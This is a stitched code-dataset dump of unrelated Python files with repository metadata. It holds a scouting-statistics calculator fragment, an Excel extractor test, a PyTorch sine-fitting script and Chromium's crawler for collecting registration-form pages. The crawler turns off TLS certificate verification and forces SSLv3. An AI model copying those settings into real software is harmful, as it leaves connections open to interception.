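            # tim_field has the form '<collection>.<field>'; only the field name is used to index each TIM document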
tim_action_counts[tim_field] = [tim[tim_field.split('.')[1]] for tim in tims]
return tim_action_counts
def calculate_averages(self, tim_action_counts):
"""Creates a dictionary of calculated averages, called team_info,
where the keys are the names of the calculations, and the values are the results
"""
team_info = {}
for calculation, schema in self.SCHEMA['averages'].items():
# Average the values for the tim_fields
average = 0
for tim_field in schema['tim_fields']:
average += self.avg(tim_action_counts[tim_field])
team_info[calculation] = average
return team_info
def calculate_standard_deviations(self, tim_action_counts):
"""Creates a dictionary of calculated standard deviations, called team_info,
where the keys are the names of the calculation, and the values are the results
"""
team_info = {}
for calculation, schema in self.SCHEMA['standard_deviations'].items():
# Take the standard deviation for the tim_field
tim_field = schema['tim_fields'][0]
standard_deviation = pstdev(tim_action_counts[tim_field])
team_info[calculation] = standard_deviation
return team_info
def filter_tims_for_counts(self, tims: List[Dict], schema):
"""Filters tims based on schema for count calculations"""
tims_that_meet_filter = tims
for key, value in schema['tim_fields'].items():
if key != 'not':
# Checks that the TIMs in their given field meet the filter
tims_that_meet_filter = list(
filter(lambda tim: tim[key] == value, tims_that_meet_filter)
)
else:
# not_field expects the output to be anything but the given filter
# not_value is the filter that not_field shouldn't have
for not_field, not_value in value.items():
# Checks that the TIMs in the 'not' field are anything other than the filter
tims_that_meet_filter = list(
filter(
lambda tim: tim.get(not_field, not_value) != not_value,
tims_that_meet_filter,
)
)
return tims_that_meet_filter
def calculate_counts(self, tims: List[Dict]):
"""Creates a dictionary of calculated counts, called team_info,
where the keys are the names of the calculations, and the values are the results
"""
team_info = {}
for calculation, schema in self.SCHEMA['counts'].items():
tims_that_meet_filter = self.filter_tims_for_counts(tims, schema)
team_info[calculation] = len(tims_that_meet_filter)
return team_info
def calculate_extrema(self, tim_action_counts):
"""Creates a dictionary of extreme values, called team_info,
where the keys are the names of the calculations, and the values are the results
"""
team_info = {}
for calculation, schema in self.SCHEMA['extrema'].items():
tim_field = schema['tim_fields'][0]
if schema['extrema_type'] == 'max':
team_info[calculation] = max(tim_action_counts[tim_field])
if schema['extrema_type'] == 'min':
team_info[calculation] = min(tim_action_counts[tim_field])
return team_info
def update_team_calcs(self, teams: list) -> list:
"""Calculate data for given team using objective calculated TIMs"""
obj_team_updates = {}
for team in teams:
# Load team data from database
obj_tims = self.server.db.find('obj_tim', team_number=team)
tim_action_counts = self.get_action_counts(obj_tims)
team_data = self.calculate_averages(tim_action_counts)
team_data['team_number'] = team
team_data.update(self.calculate_counts(obj_tims))
team_data.update(self.calculate_standard_deviations(tim_action_counts))
team_data.update(self.calculate_extrema(tim_action_counts))
obj_team_updates[team] = team_data
return list(obj_team_updates.values())
def run(self):
"""Executes the OBJ Team calculations"""
# Get oplog entries
entries = self.entries_since_last()
for update in self.update_team_calcs(self.find_team_list()):
self.server.db.update_document(
'obj_team', update, {'team_number': update['team_number']}
)
| 45.726563
| 97
| 0.633863
|
1224357c6a2e281e33f45688bd5d22a01ed2b245
| 1,305
|
py
|
Python
|
piperoni/operators/extract/extract_file/tests/test_excel.py
|
CitrineInformatics/piperoni
|
a5764e9da3a51da0a8962a00fd574a97b173d9a4
|
[
"Apache-2.0"
] | 2
|
2021-04-21T19:51:06.000Z
|
2021-04-23T17:57:09.000Z
|
piperoni/operators/extract/extract_file/tests/test_excel.py
|
CitrineInformatics/piperoni
|
a5764e9da3a51da0a8962a00fd574a97b173d9a4
|
[
"Apache-2.0"
] | null | null | null |
piperoni/operators/extract/extract_file/tests/test_excel.py
|
CitrineInformatics/piperoni
|
a5764e9da3a51da0a8962a00fd574a97b173d9a4
|
[
"Apache-2.0"
] | null | null | null |
import os
import pytest
from pandas import DataFrame
import piperoni as etl
from piperoni.operators.extract.extract_file.excel import ExcelExtractor
"""
This module implements tests for the ExcelExtractor.
"""
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
EXCEL_TEST_FILE = os.path.join(
ROOT_DIR,
"..",
"..",
"..",
"..",
"..",
"test_files",
"Strehlow and Cook.xlsx",
)
class TestExcelExtractor:
"""Tests funtionality of ExcelExtractor"""
@pytest.fixture(scope="class")
def all_sheets(self):
return ExcelExtractor()
@pytest.fixture(scope="class")
def only_one_sheet(self):
return ExcelExtractor(sheet_name="Strehlow and Cook")
def test_transform(self, all_sheets, only_one_sheet):
"""Tests loading data with the different optional arguments."""
# tests gathering all sheets
# one of the sheets does not have an aligned table
with pytest.raises(Exception):
assert all_sheets(EXCEL_TEST_FILE)
# tests gathering only one sheet
data = only_one_sheet(EXCEL_TEST_FILE)
assert isinstance(data, dict)
sheet = data["sheet"]
assert isinstance(sheet, DataFrame)
cell_value = sheet["Band gap"][536]
assert cell_value == 2.26
| 24.622642
| 72
| 0.663602
|
974066aaa4e2e0629b718429eb7fbbff1a51cf15
| 1,914
|
py
|
Python
|
Homework6/3_nn_optim_edited3.py
|
XC-Li/Deep_Learning_GWU
|
2dfe0d39ce8f9d981cee545f489f9dde1ffdfa7c
|
[
"MIT"
] | null | null | null |
Homework6/3_nn_optim_edited3.py
|
XC-Li/Deep_Learning_GWU
|
2dfe0d39ce8f9d981cee545f489f9dde1ffdfa7c
|
[
"MIT"
] | null | null | null |
Homework6/3_nn_optim_edited3.py
|
XC-Li/Deep_Learning_GWU
|
2dfe0d39ce8f9d981cee545f489f9dde1ffdfa7c
|
[
"MIT"
] | null | null | null |
#----------------------------------------------------------------------------
import torch
from torch.autograd import Variable
import numpy as np
from matplotlib import pyplot as plt
#----------------------------------------------------------------------------
Batch_size = 64 # Batch size
R = 1 # Input size
S = 100 # Number of neurons
a_size = 1 # Network output size
#----------------------------------------------------------------------------
size = 100
p = np.linspace(-3, 3, size)
t = np.sin(p)
p = Variable(torch.from_numpy(p)).float().view(size, -1).cuda()
t = Variable(torch.from_numpy(t)).float().view(size, -1).cuda()
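# view(size, -1) turns the 1-D arrays into (100, 1) column vectors so they match the nn.Linear(1, 100) input layer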
# p = Variable(torch.randn(Batch_size, R)).cuda()
# t = Variable(torch.randn(Batch_size, a_size), requires_grad=False).cuda()
model = torch.nn.Sequential(
torch.nn.Linear(1, 100),
torch.nn.ReLU(),
torch.nn.Linear(100, 50),
torch.nn.ReLU(),
torch.nn.Linear(50, 25),
torch.nn.ReLU(),
torch.nn.Linear(25, 12),
torch.nn.ReLU(),
torch.nn.Linear(12, 6),
torch.nn.ReLU(),
torch.nn.Linear(6, a_size),
)
model.cuda()
performance_index = torch.nn.MSELoss(reduction='sum')
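# reduction='sum' accumulates the squared error over all samples, so the printed loss is a total, not a mean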
#----------------------------------------------------------------------------
learning_rate = 1e-4
#----------------------------------------------------------------------------
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
#----------------------------------------------------------------------------
for index in range(10000):
a = model(p)
loss = performance_index(a, t)
print(index, loss.item())
optimizer.zero_grad()
loss.backward()
optimizer.step()
# visualize
prediction = model(p).detach().cpu().numpy()
real = t.cpu().numpy()
x = p.cpu().numpy()
plt.plot(x, real, label="Actual")
plt.scatter(x, prediction, label="NN Prediction")
plt.legend()
plt.title("t=sin(p)")
plt.show()
| 29.446154
| 77
| 0.489551
|
16e52732c497177166005ef0405496254773ee0f
| 28,920
|
py
|
Python
|
chrome/tools/webforms_aggregator.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
chrome/tools/webforms_aggregator.py
|
1065672644894730302/Chromium
|
239dd49e906be4909e293d8991e998c9816eaa35
|
[
"BSD-3-Clause"
] | 395
|
2020-04-18T08:22:18.000Z
|
2021-12-08T13:04:49.000Z
|
chrome/tools/webforms_aggregator.py
|
1065672644894730302/Chromium
|
239dd49e906be4909e293d8991e998c9816eaa35
|
[
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
#!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Downloads web pages with fillable forms after parsing through a set of links.
Used for collecting web pages with forms. Used as a standalone script.
This script assumes that it is run from within the directory in which it is
checked in. If the script were run from elsewhere, the path for
REGISTER_PAGE_DIR would need to be changed.
This script assumes that third party modules are installed:
httplib2, lxml, pycurl.
Usage: webforms_aggregator.py [options] [single url or file containing urls]
Options:
-l LOG_LEVEL, --log_level LOG_LEVEL
LOG_LEVEL: debug, info, warning or error [default: error]
-h, --help show this help message and exit
"""
import datetime
import errno
import logging
import optparse
import os
import re
# Needed in Linux so that PyCurl does not throw a segmentation fault.
import signal
import sys
import tempfile
import threading
import time
import urlparse
import httplib2
from lxml import html, etree
import pycurl
REGISTER_PAGE_DIR = os.path.join(os.pardir, 'test', 'data', 'autofill',
'heuristics', 'input')
NOT_FOUND_REG_PAGE_SITES_FILENAME = 'notFoundRegPageSites.txt'
FORM_LOCATION_COMMENT = 'Form Location: %s'
HTML_FILE_PREFIX = 'grabber-'
MAX_REDIRECTIONS = 10
# Strings in a webpage that are indicative of a registration link.
LINK_CLUES = ['regist', 'user', 'sign', 'login', 'account']
MAX_SAME_DOMAIN_URLS_NO = 30
MAX_TOTAL_URLS_PER_DOMAIN = 300
MAX_OPEN_FILES_NO = 500
# URLs are selected for downloading with the following rules from the link
# lists, giving more weight to the links that contain a link clue.
CLUE_SECURE_LINKS_NO = MAX_SAME_DOMAIN_URLS_NO * 3/10
CLUE_GENERAL_LINKS_NO = MAX_SAME_DOMAIN_URLS_NO * 3/10
SECURE_LINKS_NO = MAX_SAME_DOMAIN_URLS_NO * 2/10
GENERAL_LINKS_NO = MAX_SAME_DOMAIN_URLS_NO * 2/10
MAX_ALLOWED_THREADS = MAX_OPEN_FILES_NO / MAX_SAME_DOMAIN_URLS_NO + 1
class Retriever(object):
"""Download, parse, and check if the web page contains a registration form.
  Objects of this class have a one-to-one relation with the web pages: for
  each page that is downloaded and parsed, an object of this class is created.
  Each Retriever object creates a curl object. This object is added to the curl
  multi object of the crawler object so that the corresponding page gets
  downloaded.
"""
logger = logging.getLogger(__name__)
def __init__(self, url, domain, cookie_file):
"""Initializes a Retriever object.
Args:
url: url to download page from.
domain: only links with this domain will be retrieved.
cookie_file: the name of a cookie file, needed for pages that use session
cookies to change their contents.
"""
self._url = url
self._domain = domain
self._html_content = ''
# Http links without clues from LINK_CLUES.
self._general_links = []
# Http links that contain a clue from LINK_CLUES.
self._clues_general_links = []
# Https links that do not contain any clues from LINK_CLUES.
self._secure_links = []
# Https links that contain a clue from LINK_CLUES.
self._clues_secure_links = []
self._cookie_file = cookie_file
self._curl_object = None
def __del__(self):
"""Cleans up before this object is destroyed.
The function closes the corresponding curl object that does the downloading.
"""
if self._curl_object:
self._curl_object.close()
def _AddLink(self, link):
"""Adds url |link|, if not already present, to the appropriate list.
    The link only gets added to the single list that is appropriate for it:
_secure_links, _general_links, _clues_secure_links or _clues_general_links.
Args:
link: the url that is inserted to the appropriate links list.
"""
# Handles sites with unicode URLs.
if isinstance(link, unicode):
# Encode in 'utf-8' to avoid the UnicodeEncodeError exception.
link = httplib2.iri2uri(link).encode('utf-8')
link_parsed = urlparse.urlparse(link)
link_lists = [self._clues_secure_links, self._secure_links,
self._clues_general_links, self._general_links]
# Checks that the registration page is within the domain.
if (self._domain in link_parsed[1] and
all(link not in x for x in link_lists)):
for clue in LINK_CLUES:
if clue in link.lower():
if link_parsed[0].startswith('https'):
self._clues_secure_links.append(link)
return
else:
self._clues_general_links.append(link)
return
if link_parsed[0].startswith('https'): # No clues found in the link.
self._secure_links.append(link)
else:
self._general_links.append(link)
def ParseAndGetLinks(self):
"""Parses downloaded page and gets url link for non registration page.
Checks if current page contains a registration page and if not it gets
the url links. If it is a registration page, it saves it in a file as
'grabber-' + domain + '.html' after it has added the FORM_LOCATION_COMMENT
and it returns True. Otherwise it returns False.
Returns:
True if current page contains a registration form, and False otherwise.
Raises:
      IOError: When the file can't be written.
"""
if not self._domain:
self.logger.error('Error: self._domain was not set')
sys.exit(1)
match_list = re.findall(r'(?P<quote>[\'\"])(?P<link>(?:https?:)?//.*?)\1',
self._html_content)
for group_list in match_list:
link = group_list[1]
if link.startswith('//'):
link = urlparse.urljoin(self._url, link)
self._AddLink(link)
try:
tree = html.fromstring(self._html_content, parser=html.HTMLParser())
except etree.LxmlError:
self.logger.info('\t\tSkipping: not valid HTML code in this page <<< %s',
self._url)
return False
try:
body = tree.iter('body').next()
except StopIteration:
self.logger.info('\t\tSkipping: no "BODY" tag in this page <<< %s',
self._url)
return False
# Get a list of all input elements with attribute type='password'
password_elements = list(body.iterfind('.//input[@type="password"]'))
# Check for multiple password elements to distinguish between a login form
# and a registration form (Password field and Confirm Password field).
if password_elements and len(password_elements) >= 2:
form_elements = []
for password_elem in password_elements:
form_elem = password_elem.xpath('ancestor::form[1]')
if not form_elem:
continue
if not form_elem[0] in form_elements:
form_elements.append(form_elem[0])
else:
# Confirms that the page contains a registration form if two passwords
# are contained in the same form for form_elem[0].
if not os.path.isdir(REGISTER_PAGE_DIR):
os.makedirs(REGISTER_PAGE_DIR)
# Locate the HTML tag and insert the form location comment after it.
html_tag = tree.iter('html').next()
comment = etree.Comment(FORM_LOCATION_COMMENT % self._url)
html_tag.insert(0, comment)
# Create a new file and save the HTML registration page code.
f = open('%s/%s%s.html' % (REGISTER_PAGE_DIR, HTML_FILE_PREFIX,
self._domain), 'w')
try:
f.write(html.tostring(tree, pretty_print=True))
except IOError as e:
self.logger.error('Error: %s', e)
raise
finally:
f.close()
return True # Registration page found.
# Indicates page is not a registration page and links must be parsed.
link_elements = list(body.iter('a'))
for link_elem in link_elements:
link = link_elem.get('href')
if not link or '#' == link[0]:
continue
link = urlparse.urljoin(self._url, link)
link_parsed = urlparse.urlparse(link)
if not link_parsed[0].startswith('http'):
continue
self._AddLink(link)
return False # Registration page not found.
def InitRequestHead(self):
"""Initializes curl object for a HEAD request.
    A HEAD request is initiated so that we can check from the headers whether this is
    a valid HTML file. If it is not, we do not initiate a GET request, which saves
    unnecessary downloads.
"""
self._curl_object = pycurl.Curl()
self._curl_object.setopt(pycurl.URL, self._url)
# The following line fixes the GnuTLS package error that pycurl depends
# on for getting https pages.
self._curl_object.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3)
self._curl_object.setopt(pycurl.FOLLOWLOCATION, True)
self._curl_object.setopt(pycurl.NOBODY, True)
self._curl_object.setopt(pycurl.SSL_VERIFYPEER, False);
self._curl_object.setopt(pycurl.MAXREDIRS, MAX_REDIRECTIONS)
self._curl_object.setopt(pycurl.FAILONERROR, False)
self._curl_object.setopt(pycurl.COOKIEFILE, self._cookie_file)
self._curl_object.setopt(pycurl.COOKIEJAR, self._cookie_file)
self._curl_object.setopt(pycurl.CONNECTTIMEOUT, 30)
self._curl_object.setopt(pycurl.TIMEOUT, 300)
self._curl_object.setopt(pycurl.NOSIGNAL, 1)
def InitRequestGet(self):
"""Initializes curl object for a GET request.
    This is called only for valid HTML files, for which pycurl makes a GET request.
    The page data does not all arrive at once: as chunks of the page are downloaded,
    pycurl passes them to the write callback, which appends them to the page content
    until everything is downloaded.
"""
self._curl_object.setopt(pycurl.NOBODY, False)
self._curl_object.setopt(
pycurl.WRITEFUNCTION, lambda buff: setattr(
self, '_html_content', self._html_content + buff))
def Download(self):
"""Downloads the self._url page.
It first does a HEAD request and then it proceeds to a GET request.
It uses a curl object for a single download. This function is called only
once for the initial url of a site when we still don't have more urls from a
domain.
Returns:
True, if the downloaded page is valid HTML code, or False otherwise.
"""
self.InitRequestHead()
try:
self._curl_object.perform()
except pycurl.error as e:
self.logger.error('Error: %s, url: %s', e, self._url)
return False
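    # Record the final URL after any redirects reported by pycurl.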
self._url = urlparse.urljoin(
self._url, self._curl_object.getinfo(pycurl.EFFECTIVE_URL))
content_type = self._curl_object.getinfo(pycurl.CONTENT_TYPE)
if content_type and ('text/html' in content_type.lower()):
self.InitRequestGet()
try:
self._curl_object.perform()
except pycurl.error as e:
self.logger.error('Error: %s, url: %s', e, self._url)
return False
return True
else:
self.logger.info('\tSkipping: Not an HTML page <<< %s', self._url)
return False
def Run(self):
"""Called only once for the initial url when we do not have more urls.
Downloads the originally-specified site url, parses it and gets the links.
Returns:
True, if a registration page is found, and False otherwise.
"""
if self.Download():
if not self._domain:
url_parsed = urlparse.urlparse(self._url)
self._domain = url_parsed[1]
if self._domain.startswith('www'):
self._domain = '.'.join(self._domain.split('.')[1:])
if self.ParseAndGetLinks():
return True
return False
class Crawler(object):
"""Crawls a site until a registration page is found or max level is reached.
Creates, uses and destroys Retriever objects. Creates a cookie temp file
needed for session cookies. It keeps track of 'visited links' and
'links to visit' of the site. To do this it uses the links discovered from
each Retriever object. Use Run() to crawl the site.
"""
try:
signal.signal(signal.SIGPIPE, signal.SIG_IGN)
except ImportError:
pass
logger = logging.getLogger(__name__)
def __init__(self, url, logging_level=None):
"""Init crawler URL, links lists, logger, and creates a cookie temp file.
The cookie temp file is needed for session cookies.
Args:
url: the initial "seed" url of the site.
logging_level: the desired verbosity level, default is None.
"""
if logging_level:
self.logger.setLevel(logging_level)
self.url_error = False
url_parsed = urlparse.urlparse(url)
if not url_parsed[0].startswith('http'):
self.logger.error(
'Error: "%s" does not begin with http:// or https://', url)
self.url_error = True
return
# Example: if url is 'http://www.example.com?name=john' then value [1] or
# network location is 'www.example.com'.
if not url_parsed[1]:
self.logger.error('Error: "%s" is not a valid url', url)
self.url_error = True
return
self._url = url
self._domain = ''
# Http links that contain a clue from LINK_CLUES.
self._clues_general_links = []
# Http links that do not contain any clue from LINK_CLUES.
self._general_links = []
# Https links that contain a clue from LINK_CLUES.
self._clues_secure_links = []
# Https links that do not contain any clue from LINK_CLUES.
self._secure_links = []
# All links downloaded and parsed so far.
self._links_visited = []
self._retrievers_list = []
self._cookie_file = tempfile.NamedTemporaryFile(
suffix='.cookie', delete=False)
self._cookie_file.close()
self._cookie_file = self._cookie_file.name # Keep only the filename.
def __del__(self):
"""Deletes cookie file when Crawler instances are destroyed."""
if hasattr(self, '_cookie_file'):
self.logger.info('Deleting cookie file %s ...', self._cookie_file)
os.unlink(self._cookie_file)
def _MultiPerform(self, curl_multi_object):
"""Performs concurrent downloads using a CurlMulti object.
Args:
curl_multi_object: a curl object that downloads multiple pages
concurrently. The class of this object is |pycurl.CurlMulti|.
"""
# Following code uses the example from section for the CurlMulti object
# at http://pycurl.sourceforge.net/doc/curlmultiobject.html.
while True:
ret, no_handles = curl_multi_object.perform()
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
while no_handles:
curl_multi_object.select(1.0)
while True:
ret, no_handles = curl_multi_object.perform()
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
def _GetLinksPages(self, curl_multi_object):
"""Downloads many pages concurrently using a CurlMulti Object.
Creates many Retriever objects and adds them to a list. The constant
MAX_SAME_DOMAIN_URLS_NO defines the number of pages that can be downloaded
concurrently from the same domain using the pycurl multi object. It's
currently set to 30 URLs. These URLs are taken from the links lists, which
    are from csl, cgl, sl, and gl. The rules define how many URLs are taken from
each list during each iteration.
Example of the rules:
3/10 from csl results in 9 URLs
3/10 from cgl results in 9 URLs
2/10 from sl results in 6 URLs
2/10 from gl results in 6 URLs
Adding up the above URLs gives 30 URLs that can be downloaded concurrently.
If these lists have fewer items than the defined rules, such as if a site
does not contain any secure links, then csl and sl lists will be of 0 length
and only 15 pages would be downloaded concurrently from the same domain.
Since 30 URLs can be handled concurrently, the number of links taken from
other lists can be increased. This means that we can take 24 links from the
    cgl list so that 24 from cgl + 6 from gl = 30 URLs. If the cgl list has fewer
    than 24 links, e.g. there are only 21 links, then 9 links are taken
    from gl so 0 + 21 + 0 + 9 = 30.
Args:
curl_multi_object: Each Retriever object has a curl object which is
added to the CurlMulti Object.
"""
self._retrievers_list = []
csl_no = min(CLUE_SECURE_LINKS_NO, len(self._clues_secure_links))
cgl_no = min(CLUE_GENERAL_LINKS_NO, len(self._clues_general_links))
sl_no = min(SECURE_LINKS_NO, len(self._secure_links))
gl_no = min(GENERAL_LINKS_NO, len(self._general_links))
    # If some of the lists have fewer items than needed, the missing links
    # will be taken according to the following priority: csl, cgl, sl, gl.
# c: clues, s: secure, g: general, l: list.
spare_links = MAX_SAME_DOMAIN_URLS_NO - (csl_no + sl_no + cgl_no + gl_no)
if spare_links > 0:
csl_no = min(csl_no + spare_links, len(self._clues_secure_links))
spare_links = MAX_SAME_DOMAIN_URLS_NO - (csl_no + sl_no + cgl_no + gl_no)
if spare_links > 0:
cgl_no = min(cgl_no + spare_links, len(self._clues_general_links))
spare_links = MAX_SAME_DOMAIN_URLS_NO - (csl_no + sl_no + cgl_no + gl_no)
if spare_links > 0:
sl_no = min(sl_no + spare_links, len(self._secure_links))
spare_links = MAX_SAME_DOMAIN_URLS_NO - (csl_no + sl_no + cgl_no + gl_no)
if spare_links > 0:
gl_no = min(gl_no + spare_links, len(self._general_links))
for no_of_links, links in [
(csl_no, self._clues_secure_links),
(sl_no, self._secure_links),
(cgl_no, self._clues_general_links),
(gl_no, self._general_links)]:
for i in xrange(no_of_links):
if not links:
break
url = links.pop(0)
self._links_visited.append(url)
r = Retriever(url, self._domain, self._cookie_file)
r.InitRequestHead()
curl_multi_object.add_handle(r._curl_object)
self._retrievers_list.append(r)
if self._retrievers_list:
try:
self._MultiPerform(curl_multi_object)
except pycurl.error as e:
self.logger.error('Error: %s, url: %s', e, self._url)
finally:
for r in self._retrievers_list:
curl_multi_object.remove_handle(r._curl_object)
# |_retrievers_list[:]| is a copy of |_retrievers_list| to avoid removing
# items from the iterated list.
for r in self._retrievers_list[:]:
r._url = urlparse.urljoin(r._url, r._curl_object.getinfo(
pycurl.EFFECTIVE_URL))
content_type = r._curl_object.getinfo(pycurl.CONTENT_TYPE)
if content_type and ('text/html' in content_type.lower()):
r.InitRequestGet()
curl_multi_object.add_handle(r._curl_object)
else:
self._retrievers_list.remove(r)
self.logger.info('\tSkipping: Not an HTML page <<< %s', r._url)
if self._retrievers_list:
try:
self._MultiPerform(curl_multi_object)
except pycurl.error as e:
self.logger.error('Error: %s, url: %s', e, self._url)
finally:
for r in self._retrievers_list:
curl_multi_object.remove_handle(r._curl_object)
self.logger.info('Downloaded: %s', r._url)
def _LogRegPageFound(self, retriever):
"""Display logging for registration page found.
Args:
retriever: The object that has retrieved the page.
"""
self.logger.info('\t##############################################')
self.logger.info('\t### %s ###', retriever._domain)
self.logger.info('\t##############################################')
self.logger.info('\t!!!!!!!!! registration page FOUND !!!!!!!!!!!')
self.logger.info('\t%s', retriever._url)
self.logger.info('\t##############################################')
def _GetNewLinks(self, retriever):
"""Appends new links discovered by each retriever to the appropriate lists.
Links are copied to the links list of the crawler object, which holds all
    the links found from all retrievers that the crawler object created. The
    Crawler object exists for as long as a specific site is examined, and the
    Retriever object exists for as long as a page of this site is examined.
Args:
retriever: a temporary object that downloads a specific page, parses the
content and gets the page's href link.
"""
for link in retriever._clues_secure_links:
if (not link in self._clues_secure_links and
not link in self._links_visited):
self._clues_secure_links.append(link)
for link in retriever._secure_links:
if (not link in self._secure_links and
not link in self._links_visited):
self._secure_links.append(link)
for link in retriever._clues_general_links:
if (not link in self._clues_general_links and
not link in self._links_visited):
self._clues_general_links.append(link)
for link in retriever._general_links:
if (not link in self._general_links and
not link in self._links_visited):
self._general_links.append(link)
def Run(self):
"""Runs the Crawler.
Creates a Retriever object and calls its run method to get the first links,
and then uses CurlMulti object and creates many Retriever objects to get
the subsequent pages.
The number of pages (=Retriever objs) created each time is restricted by
MAX_SAME_DOMAIN_URLS_NO. After this number of Retriever objects download
and parse their pages, we do the same again. The number of total pages
visited is kept in urls_visited.
If no registration page is found, the Crawler object will give up its try
after MAX_TOTAL_URLS_PER_DOMAIN is reached.
Returns:
      True is returned if a registration page is found, or False otherwise.
"""
reg_page_found = False
if self.url_error:
return False
r = Retriever(self._url, self._domain, self._cookie_file)
if r.Run():
self._LogRegPageFound(r)
reg_page_found = True
else:
self._url = r._url
self._domain = r._domain
self.logger.info('url to crawl: %s', self._url)
self.logger.info('domain: %s', self._domain)
self._links_visited.append(r._url)
self._GetNewLinks(r)
urls_visited = 1
while True:
if (not (self._clues_secure_links or self._secure_links or
self._clues_general_links or self._general_links) or
urls_visited >= MAX_TOTAL_URLS_PER_DOMAIN):
break # Registration page not found.
m = pycurl.CurlMulti()
self._GetLinksPages(m)
urls_visited += len(self._retrievers_list)
self.logger.info('\t<----- URLs visited for domain "%s": %d ----->',
self._domain, urls_visited)
for r in self._retrievers_list:
if r.ParseAndGetLinks():
self._LogRegPageFound(r)
reg_page_found = True
break
else:
self.logger.info('parsed: %s', r._url)
self._GetNewLinks(r)
m.close()
if reg_page_found:
break
while self._retrievers_list:
r = self._retrievers_list.pop()
return reg_page_found
class WorkerThread(threading.Thread):
"""Creates a new thread of execution."""
def __init__(self, url):
"""Creates _url and page_found attri to populate urls_with_no_reg_page file.
Used after thread's termination for the creation of a file with a list of
the urls for which a registration page wasn't found.
Args:
url: will be used as an argument to create a Crawler object later.
"""
threading.Thread.__init__(self)
self._url = url
self.page_found = False
def run(self):
"""Execution of thread creates a Crawler object and runs it.
    Caution: this function name should not be changed to 'Run' or any other
    name, because it overrides the 'run' method of the 'threading.Thread'
class. Otherwise it will never be called.
"""
self.page_found = Crawler(self._url).Run()
class ThreadedCrawler(object):
"""Calls the Run function of WorkerThread which creates & runs a Crawler obj.
  The crawler objects run concurrently, each examining one site.
"""
logger = logging.getLogger(__name__)
def __init__(self, urls_file, logging_level=None):
"""Creates threaded Crawler objects.
Args:
urls_file: a text file containing a URL in each line.
logging_level: verbosity level, default is None.
Raises:
      IOError: If no URLs can be found in the file.
"""
if logging_level:
self.logger.setLevel(logging_level)
self._urls_list = []
f = open(urls_file)
try:
for url in f.readlines():
url = url.strip()
if not urlparse.urlparse(url)[0].startswith('http'):
self.logger.info(
'%s: skipping this (does not begin with "http://")', url)
continue
self._urls_list.append(url)
except IOError as e:
self.logger.error('Error: %s', e)
raise
finally:
f.close()
if not self._urls_list:
error_msg = 'No URLs were found.'
self.logger.error('ERROR: %s', error_msg)
raise IOError(error_msg)
def Run(self):
"""Runs Crawler objects using python threads.
Number of concurrent threads is restricted to MAX_ALLOWED_THREADS.
Returns:
The number of registration pages found. -1 if no URLs are given.
Raises:
      OSError: If the output directory cannot be created for a reason other than it already existing.
"""
if self._urls_list:
allThreads = []
# originalNumThreads is the number of threads just before the
# ThreadedCrawler starts creating new threads. As a standalone script it
# will be 1.
originalNumThreads = threading.active_count()
for url in self._urls_list:
self.logger.info('URL fed to a crawler thread: %s', url)
t = WorkerThread(url)
t.start()
allThreads.append(t)
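        # Throttle: wait until the number of running crawler threads drops below the allowed maximum.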
while threading.active_count() >= (
MAX_ALLOWED_THREADS + originalNumThreads):
time.sleep(.4)
while threading.active_count() > originalNumThreads:
time.sleep(.4)
self.logger.info('----------------')
self.logger.info('--- FINISHED ---')
self.logger.info('----------------')
urls_no = 0
urls_not_found_no = 0
not_file_name = os.path.join(
REGISTER_PAGE_DIR, NOT_FOUND_REG_PAGE_SITES_FILENAME)
not_file_dir = os.path.dirname(not_file_name)
try:
os.makedirs(not_file_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
fnot = open(not_file_name, 'wb')
try:
for t in sorted(allThreads, key=lambda t: t._url):
urls_no += 1
if not t.page_found:
urls_not_found_no += 1
fnot.write('%s' % t._url)
fnot.write(os.linesep)
except IOError as e:
self.logger.error('Error: %s', e)
finally:
fnot.close()
self.logger.info('Total number of URLs given: %d\n', urls_no)
self.logger.info(
'Registration pages found: %d\n', (urls_no - urls_not_found_no))
self.logger.info(
'URLs that did not return a registration page: %d\n',
urls_not_found_no)
return urls_no - urls_not_found_no
else:
self.logger.error('Error: no URLs were found.')
return -1
def main():
usage = 'usage: %prog [options] single_url_or_urls_filename'
parser = optparse.OptionParser(usage)
parser.add_option(
'-l', '--log_level', metavar='LOG_LEVEL', default='error',
help='LOG_LEVEL: debug, info, warning or error [default: %default]')
(options, args) = parser.parse_args()
options.log_level = options.log_level.upper()
if options.log_level not in ['DEBUG', 'INFO', 'WARNING', 'ERROR']:
print 'Wrong log_level argument.'
parser.print_help()
return 1
options.log_level = getattr(logging, options.log_level)
if len(args) != 1:
parser.error('Wrong number of arguments.')
logger = logging.getLogger(__name__)
if options.log_level:
console = logging.StreamHandler()
logger.addHandler(console)
logger.setLevel(options.log_level)
arg_is_a_file = os.path.isfile(args[0])
if arg_is_a_file:
CrawlerClass = ThreadedCrawler
else:
CrawlerClass = Crawler
t0 = datetime.datetime.now()
c = CrawlerClass(args[0], options.log_level)
c.Run()
if not arg_is_a_file and c.url_error:
logger.error(
'ERROR: "%s" is neither a valid filename nor a valid URL' % args[0])
t1 = datetime.datetime.now()
delta_t = t1 - t0
logger.info('Started at: %s\n', t0)
logger.info('Ended at: %s\n', t1)
logger.info('Total execution time: %s\n', delta_t)
return 0
if __name__ == "__main__":
sys.exit(main())
| 37.607282
| 80
| 0.670263
|
d8cc4e8e3c8c96c413b7bd0c45ca524ca2e554fd
| 1,751
|
py
|
Python
|
env/Lib/site-packages/autobahn/websocket/__init__.py
|
AnilCharles96/django_chat_app
|
4b90fa90a703fe002e7e305e85c7621db7275d6f
|
[
"MIT"
] | 11
|
2016-09-14T21:58:37.000Z
|
2019-01-28T21:56:14.000Z
|
env/Lib/site-packages/autobahn/websocket/__init__.py
|
AnilCharles96/django_chat_app
|
4b90fa90a703fe002e7e305e85c7621db7275d6f
|
[
"MIT"
] | 14
|
2015-04-25T17:54:13.000Z
|
